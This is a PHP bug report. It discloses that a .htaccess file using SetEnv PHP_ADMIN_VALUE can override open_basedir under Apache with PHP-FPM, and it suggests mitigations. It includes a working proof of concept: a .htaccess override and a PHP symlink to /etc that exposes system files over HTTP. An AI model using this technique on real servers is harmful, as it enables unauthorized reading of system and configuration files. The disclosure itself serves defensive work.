[2016-04-29 15:46 UTC] ouroboros_17 at hotmail dot com

Description:
------------
It is possible, for a malicious user, to change PHP configuration with a .htaccess file on Apache with PHP-FPM. It is not something trivial, but if he can upload a .htaccess in the www folder, he can break open_basedir restrictions (see example below).

This behaviour can be fixed:
- AllowOverride None in Apache configuration (a good practice but it is not really usual in the real world)
- prevent upload of .htaccess (application side, not related with PHP-FPM)
- disable mod_env

PHP as a module of Apache cannot be affected because only php_value can be set in .htaccess.

It should be documented at least, or it should be possible to disable the hability to set configuration via environment variables.

See bug #3991 too.

Test script:
---------------
Apache vhost
------------------
DocumentRoot /var/www
<Directory /var/www/>
  AllowOverride All

  <FilesMatch \.php$>
    SetHandler "proxy:unix:/var/run/php5-fpm.sock|fcgi://localhost/"
  </FilesMatch>
</Directory>


/var/www/.htaccess
------------------
Options +FollowSymLinks -SymLinksIfOwnerMatch
SetEnv PHP_ADMIN_VALUE "open_basedir=/"


/var/www/index.php
------------------
<?php symlink('/etc', 'foo');


PHP-FPM pool
------------------
[...]
php_admin_value[open_basedir] = /var/www


Access "index.php" with HTTP so it creates the symlink, see files in /etc via the http://example.com/foo URI.